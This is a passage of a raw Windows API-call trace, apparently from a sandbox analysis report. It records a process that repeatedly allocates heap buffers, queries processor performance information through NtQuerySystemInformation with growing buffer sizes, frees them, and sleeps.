(HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0240.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0240.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.829] Sleep (dwMilliseconds=0x110) [0240.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0240.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0240.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0240.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0240.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0240.846] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0240.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0240.847] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.847] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0240.847] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.848] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.848] Sleep (dwMilliseconds=0x110) [0240.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0240.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0240.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0240.860] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.861] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0240.861] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0240.861] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0240.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0240.862] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.862] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0240.862] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.863] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.863] Sleep (dwMilliseconds=0x110) [0240.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0240.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0240.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0240.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0240.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0240.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0240.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0240.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0240.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.881] Sleep (dwMilliseconds=0x110) [0240.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0240.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0240.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0240.897] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0240.898] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0240.898] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.899] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0240.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0240.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.904] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0240.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.905] Sleep (dwMilliseconds=0x110) [0240.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0240.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0240.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0240.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0240.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0240.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0240.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0240.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0240.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.926] Sleep (dwMilliseconds=0x110) [0240.934] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0240.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0240.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0240.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0240.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0240.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0240.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0240.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0240.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.941] Sleep (dwMilliseconds=0x110) [0240.962] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0240.962] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.962] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0240.963] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0240.963] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.963] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0240.963] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0240.963] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.964] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0240.964] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0240.964] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.964] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0240.964] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.965] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.965] Sleep (dwMilliseconds=0x110) [0240.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0240.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0240.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0240.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0240.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0240.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0240.991] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0240.991] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0240.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0240.992] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0240.992] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0240.992] Sleep (dwMilliseconds=0x110) [0240.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0240.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0240.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0240.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0240.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0241.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0241.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0241.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0241.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0241.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.002] Sleep (dwMilliseconds=0x110) [0241.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0241.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0241.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0241.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0241.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0241.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0241.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0241.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0241.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.064] Sleep (dwMilliseconds=0x110) [0241.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0241.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0241.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0241.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0241.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0241.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0241.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0241.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0241.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.079] Sleep (dwMilliseconds=0x110) [0241.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0241.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0241.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0241.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0241.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0241.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0241.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0241.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0241.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.095] Sleep (dwMilliseconds=0x110) [0241.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0241.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0241.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0241.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0241.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0241.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0241.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0241.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0241.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.111] Sleep (dwMilliseconds=0x110) [0241.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0241.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0241.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0241.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0241.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0241.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 